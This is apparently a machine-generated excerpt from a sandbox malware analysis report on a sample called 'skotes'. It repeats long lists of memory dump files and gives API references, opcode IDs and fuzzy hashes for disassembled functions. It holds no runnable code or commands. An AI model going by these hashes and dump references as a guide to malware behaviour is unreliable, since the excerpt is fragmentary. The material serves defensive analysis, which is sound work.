                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                • String ID: csm
                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                • Opcode ID: 84a2739706256badd986a69b4fbcb20368683aa049836791e4b5d86ac17e2b17
                                                                                                                                                                • Instruction ID: 6dce73c7251723ce7ca308e36bf2af044f287cb74739544ee2ebd35452f00d6e
                                                                                                                                                                • Opcode Fuzzy Hash: 84a2739706256badd986a69b4fbcb20368683aa049836791e4b5d86ac17e2b17
                                                                                                                                                                • Instruction Fuzzy Hash: F2419E34A00258AFCF10DF68D885AFEBBE5FF45324F148195E8189B3A3D7B19A15CB91
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00BADD91
                                                                                                                                                                • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00BADDAE
                                                                                                                                                                • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00BADE14
                                                                                                                                                                • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00BADE29
                                                                                                                                                                • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00BADE3B
                                                                                                                                                                • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 00BADE4B
                                                                                                                                                                • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00BADE74
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2885714658-0
                                                                                                                                                                • Opcode ID: 1cbc1efc6e26c0d17c4e8d3f40c65b1da0da3d7ef2a52bcbe5a5a059fd253e7d
                                                                                                                                                                • Instruction ID: 3fb390e50b4d209ae03c7822d5c800263d7a75af9a504685d578c4e95a458a2c
                                                                                                                                                                • Opcode Fuzzy Hash: 1cbc1efc6e26c0d17c4e8d3f40c65b1da0da3d7ef2a52bcbe5a5a059fd253e7d
                                                                                                                                                                • Instruction Fuzzy Hash: A5418C30A0C2449ACF14FBA484957ED7BE5AF12704F1444F9E8926B6D3DB348E08C762
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00BAE7D7
                                                                                                                                                                  • Part of subcall function 00BAE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00BAE577
                                                                                                                                                                  • Part of subcall function 00BAE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00BAE599
                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00BAE854
                                                                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00BAE860
                                                                                                                                                                • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00BAE86F
                                                                                                                                                                • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00BAE879
                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00BAE8AD
                                                                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00BAE8B5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1924466884-0
                                                                                                                                                                • Opcode ID: 5c3666228f1561bd1e5b99abfe48fd4474aa030e47ea2f5195c9f6e6e0ace985
                                                                                                                                                                • Instruction ID: a62b4a620b70380898124a436990fa7df5e4adf1bd54f8a16c1ca48ab1544664
                                                                                                                                                                • Opcode Fuzzy Hash: 5c3666228f1561bd1e5b99abfe48fd4474aa030e47ea2f5195c9f6e6e0ace985
                                                                                                                                                                • Instruction Fuzzy Hash: 4A413875A04205AFCF00EF64C895BADB7F5FF49310F1480A9DD599B382DB34A941CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00B96ED1
                                                                                                                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00B96F22
                                                                                                                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00B96F32
                                                                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00B96FD5
                                                                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00B970DB
                                                                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00B97116
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1997747980-0
                                                                                                                                                                • Opcode ID: 59b3e6d497f97d937b2dc59740113be195fb3072a4e7a4720f1f14e23b73d03e
                                                                                                                                                                • Instruction ID: dcd19c665096bd5ecd85d569024decd90dd54d951a47eeab23675b15a4c7a944
